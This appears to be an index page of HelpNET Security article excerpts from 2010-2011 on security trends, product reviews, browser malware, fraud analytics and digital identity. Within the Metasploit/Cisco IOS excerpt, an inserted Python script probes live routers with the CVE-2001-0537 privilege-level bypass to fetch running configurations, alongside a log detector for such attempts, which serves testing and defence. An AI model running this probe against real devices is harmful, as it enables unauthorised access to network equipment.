
HelpNET Articles

by Stefan Frei - Research Analyst Director, Secunia - Monday, 24 January 2011.

There is an on-going arms-race in the IT security industry between vendors striving to produce secure software, and researchers’ and cybercriminals’ efforts (and successes) in finding new vulnerabilities in software. The number of vulnerabilities in general over the last five years reached over 4,300 on average per year with no significant up- or downward trend. During the period from 2009 to 2010, the number actu...

by Nick Lowe - Check Point - Monday, 17 January 2011.

Predicting the distant future of IT security is tricky, but the near future – the next 12 to 18 months – is a little easier. After all, the seeds of what is to come were planted in the recent past. Traditional security threats posed by hackers, viruses and worms over the past 10-plus years are still a concern, and have been joined by newer, emerging threats from the proliferation of Web 2.0 apps, mobile computing and custom attacks.


Avast! Free Antivirus (v.5.1.864) is an anti-virus, anti-spyware software with boot-time scanning capabilities. It also incorporates anti-rootkit and strong self-protection capabilities, and contains several real-time "Shields" which continuously monitor your email and internet connections and check the files on your computer whenever they are opened or closed.

The installation process is a breeze, and you can choose a custom installation if you want. You are also offered the option to install Google's Chrome browser, which you can decline. After an initial quick scan of the system, the process is complete and you can start the program.

When it starts, you are immediately asked to register it, and you should if you want to use it beyond the 30-day trial period and to receive virus database updates.

Welcome screen (click on the screenshots to enlarge them):

As you can see, in the Maintenance tab you can update virus signatures and the software, register it, and access the Virus Chest (usually called Quarantine in antivirus software - the place where found malware is removed to).

Before starting anything, let's check the general settings first. There you can configure things like the size of the virus chest, how long the popups will "last", various updates and exclusions of paths to be scanned, set up e-mail alerts when malware is found, set up a password for accessing the software or its various areas, select silent/gaming mode, sounds and language, automatic deletion of logs after a set period of time, and troubleshooting settings:

When you finish with that, you can proceed to configuring the settings of the various Real-time Shields: File System, Mail, Web, P2P, IM, Network and Behavior. They are all running by default, but can also be turned off. If you do so, you will usually be asked to confirm the action:

Every shield can be closely configured by accessing and changing its Expert Settings. If you are a novice and not comfortable doing that, simply leave them as they are.

The File System Shield can be set to scan programs, scripts and DLLs when executing or loading, files when opening and auto-run items when removable media is attached to the computer. Some settings are the same for every shield, such as exclusions to rules, actions that the software is set to make when viruses or potentially unwanted or suspicious software is found, testing sensitivity, and the report option.


by Zeljka Zorz - Thursday, 30 December 2010.

Steganos Privacy Suite (v.12) is a suite offering most Steganos privacy and encryption products bundled up together: Safe, Portable Safe, Crypt & Hide, Password Manager, Private Favorites, E-Mail Encryption, Trace Destructor and Shredder.

Welcome screen:

A simple click on any of the icons on the left part of the screen will take you to the tool you need.

Since I have previously presented Steganos Safe, Portable Safe and Shredder on this site, I won't be going into details about their functioning - I will just mention new features of the tools (if there are any).

Safe and Personal Safe

The only new feature in the Safe tool is the option of hiding (attaching) a Safe in a video, audio or executable file without affecting its form or function. This way, you can still run those files, and the Safe has the additional bonus of being hidden in plain sight. Note that forensic tools can still detect its existence, but the Safe can't be opened without the right password. Also, you can hide a Safe in one of those files only if the Safe does not exceed 3 GB in size.

Crypt & Hide

Used for encrypting and hiding files and folders:

With one click of the mouse, you can add or remove, save, hide or extract files. To save and hide them, you must provide a password, which restricts access to the archive and is required to open it again. Original files must be deleted by hand.

Password Manager

To use it, you must first create a user profile and secure it with a password. Then, you can enter/edit bank account/credit card and general information:

When you close the database, it is automatically encrypted. If you are a Firefox user, the software will automatically add a toolbar on your browser that will help you access and use your data, passwords and Private Favorites.

Private Favorites

As with the Password Manager, you must first create a user profile. This tool helps you manage Internet addresses and make them invisible to third parties that might be using your computer.

E-Mail Encryption

To use this tool, an e-mail program must be associated with it - the association is created in the Default Programs control panel. You can encrypt entire e-mails as attached components or only the part of the text you enter in the appropriate field. The sent file is self-decrypting, but the recipient needs the password you set in order to decrypt it.


by Mickey Boodaei - CEO Trusteer - Monday, 27 December 2010.

Evidence is everywhere that cyber criminals exist, and they’re able to make a substantial living from their illegal activities. While it is true that many are focusing their efforts on individuals, others have their sights set much higher. They are targeting enterprises to steal their highly prized intellectual property, log-in credentials, financial data and other sensitive information that resides within the once safe confines of the corporate network or in web applications.

Numerous articles have been written on why you need to protect this data. Instead, we're going to focus on the business at hand - the "Man in the Browser". How is he getting into enterprise networks and applications and, more importantly, how can you stop him?

The browser has emerged as the weakest link in an enterprise’s security infrastructure. It is being successfully exploited by malware authors and criminals who use this method to steal logon credentials and inject Trojans that crack IT systems wide open, often undetected.

With these browser sessions often containing the logon details for email systems, VPNs, cloud services – such as cloud CRM, it is a critical area to secure and lock down without impacting performance.

However, the growing demand for mobility makes this easier said than done. Once upon a time, remote access to enterprise resources was the privilege of a chosen few employees, who used standard computers owned and managed by the enterprise, making security a big, yet ultimately manageable, task. Today such access capabilities have exploded to allow virtually any employee, contractor and partner to gain entry.

The problem is further compounded as these 'trusted users' are allowed to choose their laptop and smartphone, as well as use their home PC for work purposes and generally control their own IT environment. With more resources for them to access, and in the majority of cases not contained within a protected server farm, they're literally out there in the wild. It is this adoption of unmanaged home-and-work laptops and personal PCs that has led, in many cases, to malware infestations.

It’s not safe out there

With more than 57,000 new malicious sites created each week, most of which mimic prominent web sites, it's hard not to stumble upon a spoof site and get infected. As users innocently browse these 'respectable' sites, they can inadvertently fall victim to drive-by infections. These attacks aren't limited to spoof/phishing sites: they also reside on legitimate websites that have been compromised to serve malware, and the criminals use search engine optimization (SEO) techniques to push those pages to the top of search results to maximize the number of people infected.


by HD Moore - CSO at Rapid7 - Tuesday, 21 December 2010.

The Metasploit Framework and the commercial Metasploit products have always provided features for assessing the security of network devices. With the latest release, we took this a step further and focused on accelerating the penetration testing process for Cisco IOS devices. While the individual modules and supporting libraries were added to the open source framework, the commercial products can now chain these modules together to quickly compromise all vulnerable devices on the network. The screen shot below gives you an idea of what a successful penetration test can look like:

To begin with, I should state that a properly configured Cisco device is a tough target to crack. Vulnerabilities exist in IOS, just like any other piece of software, but only a few folks have managed to leverage memory corruption flaws into code execution. For this reason, the majority of real-world attacks against IOS devices tend to focus on two areas: poor configuration and weak passwords.

Before we dive into the specifics, let's review the current "state of the art" in Cisco IOS security testing. Vulnerability scanners do a great job of identifying out-of-date IOS installations by comparing version strings. This works well for determining whether a device is patched, but doesn't help a penetration tester who doesn't have a deep background in IOS exploitation. With few exceptions, this leaves a small number of services that are commonly exposed in production environments. These services include SNMP, Telnet, SSH, and HTTP. You may also find Finger running, or relay services for media protocols like SIP and H.323. For remote access, the first four are what most of us have to work with, and even then, it's rare to find a properly configured router with any of those services exposed to the network at large.

The Cisco IOS HTTP service has a few well-known vulnerabilities on older versions of the operating system. The two we care about as penetration testers both relate to authentication bypass. The first flaw, CVE-2000-0945, relates to missing authentication in the IOS Device Manager interface. This vulnerability allows unauthenticated, often privileged access to the IOS installation through the web interface. The second vulnerability, CVE-2001-0537, allows an attacker to bypass authentication by specifying a privilege level higher than 15 (the highest legitimate level) in the request to the HTTP service. This also provides privileged access to the device through the web interface. The open source Metasploit Framework now provides two modules for exploiting these vulnerabilities:
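The level-bypass described above is easy to check for and easy to spot in logs, which makes it a good illustration of both sides of the problem. The following script is an added example, not one of the Metasploit modules the article refers to and not Cisco's or Rapid7's code. It assumes the affected request form is a path of the shape /level/NN/exec/... with NN above 15 (the form the advisory for this bug documents); the specific command suffix show/running-config, the "hostname" marker used to recognise a leaked configuration, and the sample log lines are all constructed for the example. The probe function contacts a live device and must only be run against systems you are authorised to test; the log-detection function runs entirely offline.

```python
"""Probe and log-detection helpers for the IOS HTTP privilege-level bypass
(CVE-2001-0537) discussed above.  Added example: not Metasploit, Cisco or
Rapid7 code.  Path suffix, body marker and sample log lines are constructed."""
import http.client
import re
from typing import Iterable

# Levels 0-15 are the legitimate IOS privilege range; affected devices also
# honoured 16-99 in the URL without proper authorization checks.
VULN_LEVELS = range(16, 100)
COMMAND = "show/running-config"  # assumption: exec command mapped onto the URL


def probe_paths(levels: Iterable[int] = VULN_LEVELS, command: str = COMMAND):
    """Build one request path per out-of-range privilege level."""
    return [f"/level/{lvl}/exec/{command}" for lvl in levels]


def classify(status: int, body: bytes) -> str:
    """Interpret one response.  A 200 carrying configuration text means the
    level check was bypassed; 401/403 means authentication is enforced."""
    if status == 200 and b"hostname" in body:  # assumption: config leaked
        return "bypass"
    if status in (401, 403):
        return "auth-enforced"
    return "inconclusive"


def probe(host: str, port: int = 80, timeout: float = 5.0, levels=VULN_LEVELS):
    """Try each level against a live device.  Authorised testing only."""
    results = {}
    for path in probe_paths(levels):
        conn = http.client.HTTPConnection(host, port, timeout=timeout)
        try:
            conn.request("GET", path)
            resp = conn.getresponse()
            verdict = classify(resp.status, resp.read())
        except OSError as exc:
            verdict = f"error: {exc}"
        finally:
            conn.close()
        results[path] = verdict
        if verdict == "bypass":
            break  # one success already proves the device is vulnerable
    return results


# Detection side: any exec URL whose level exceeds 15 is an attack indicator,
# regardless of whether the device answered 200 or 401.
LEVEL_RE = re.compile(r'"(?:GET|POST) (/level/(\d+)/exec/[^ "]*)')


def find_bypass_attempts(log_lines):
    """Return (client_ip, path) for each request using a level above 15."""
    hits = []
    for line in log_lines:
        m = LEVEL_RE.search(line)
        if m and int(m.group(2)) > 15:
            hits.append((line.split()[0], m.group(1)))
    return hits


SAMPLE_LOG = [  # constructed, common-log-format style lines from a proxy in front of the device
    '10.0.0.5 - - [21/Dec/2010:10:00:01 +0000] "GET /level/15/exec/show/version HTTP/1.0" 401 0',
    '10.0.0.5 - - [21/Dec/2010:10:00:02 +0000] "GET /level/16/exec/show/running-config HTTP/1.0" 200 4120',
    '10.0.0.9 - - [21/Dec/2010:10:00:03 +0000] "GET /index.html HTTP/1.0" 200 512',
]

if __name__ == "__main__":
    for ip, path in find_bypass_attempts(SAMPLE_LOG):
        print(f"bypass attempt from {ip}: {path}")
```

The probe stops at the first level that succeeds because every further hit proves the same thing; a scanner that wants the full list of accepted levels can drop the break. On the detection side, the level-15 request in the sample log is not flagged: it is a legitimate privilege level and, as the 401 shows, the device enforced authentication for it.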


by Graham Kemp - Head of public sector, SAS UK - Monday, 20 December 2010.

Where there is money, there is the potential for misappropriation or misuse – intentional or otherwise. Nowhere is this more apparent than in governments where funds are held accountable to a cynical taxpaying public. As such, it’s no surprise that millions of pounds can be siphoned away from worthy programs due to problems with process, lack of transparency or outright fraud.

The National Fraud Authority (NFA) recently identified that around £25 billion of taxpayers' money is wasted every year through fraud and error in the public sector. With figures like these, it is easy to see that the UK government faces enormous challenges in attempting to prevent improper payments caused by fraud and error. But are such misuses of government funds controllable at lower levels, or avoidable altogether?

The answer is yes – with the right tools. A significant portion of government-funded fraud and error can not only be identified and more effectively recovered; it can be prevented – simply by gaining deeper insights into existing records of program activities and financial data.

However, these insights cannot be achieved without the right plan and tools in place. To effectively manage the risks associated with fraud and improper payments, there are five steps that government departments should take to ensure the taxpayer funds are making their way into the right pockets.

Step 1: Gain a cohesive, agency-wide view of program activity

The most pressing challenge that government organizations face is that data systems containing information relevant to fraud and error cannot share information with one another. This lack of cohesion is causing errors or fraudulent actions to slip through the cracks.

By integrating technologies that support program, recipient and financial data, government agencies can break down internal data silos to bring vital information into a single, unified frame.

Step 2: Apply analytics that detect potentially fraudulent activity

Government departments have as much (in some cases more) data as any organization in the country. However, most have no way to sift through all of this data to detect indicators of fraud. With the right analytical techniques, an agency can identify fraudulent claims before they are paid, and prioritize for investigation those payments that appear to be improper.

By deploying advanced analytics and analytical techniques to deliver insights applicable to a number of issues, agencies can rapidly detect existing and emerging fraud schemes and patterns before they cause serious problems.


In the past decade our identity has undeniably evolved, we're preoccupied with identity theft and authentication issues, while governments work to adopt open identity technologies. David Mahdi, a Product Manager at Entrust, explains the critical issues in understanding the very nature of identity in a society actively building bridges between the real and digital world.

What are the critical issues in understanding the very nature of identity in a society actively building bridges between the real and digital world?

While one’s identity in a digital world is analogous to what it is in the traditional “real” world, the challenges and issues associated with trusting one’s digital identity, managing it, and securing it are very different between these two worlds.

The core value to one’s digital identity is Trust. In the real world an individual is able to easily confirm their identity by presenting documents, such as a passport or driver’s license, that have been issued by authorities, based on verifiable information provided by the individual. And because these authorities (such as governments) are trusted, the documents, or credentials they issue can be used by the individual to prove their identity with many different organizations that might be offering services.

In the digital world, however, trust is not as easy to determine. Like the real world, a digital identity must be issued by a trusted authority. The extent to which that digital identity can be used may well be a function of the trust that other organizations put in that Authority. In some cases a digital identity may be issued by a single Authority - a bank, a retailer or even a government agency - and that identity may only be used with that Authority. As a result, to take advantage of the digital world, individuals may have many digital identities. This, however, is not ideal. If the Authority that issues a digital identity is trusted by other organizations, in much the same way that a government issuing passports is trusted, then the digital identities they issue could also be trusted by other organizations, and be used more broadly. But establishing that trust is one of the key challenges of the digital world.

As a result, an individual’s digital identity may actually consist of many different identities, issued by many different organizations, and generally they’ll be used only and trusted by the organization that issued them. This creates a bit of a management nightmare for individuals in the online world as they’re faced with keeping track of which identity is used with which organization, where that identity is stored electronically and, most importantly, how to protect it.


by Mirko Zorz - Friday, 17 December 2010.

Jayson E. Street is the Chief Infosec Officer at Stratagem 1 Solutions, the author of the book Dissecting the hack: the f0rb1dd3n network and a well-known information security speaker.

Jayson offers advice for companies on how to prepare themselves for potentially dangerous social engineering situations:

  • Basic security awareness training, the best way to do it and how to encourage your employees.
  • Constant reinforcement of security practices and ideals, and how that keeps you safe.
  • How to create a positive environment where security is enforced long after training is over.
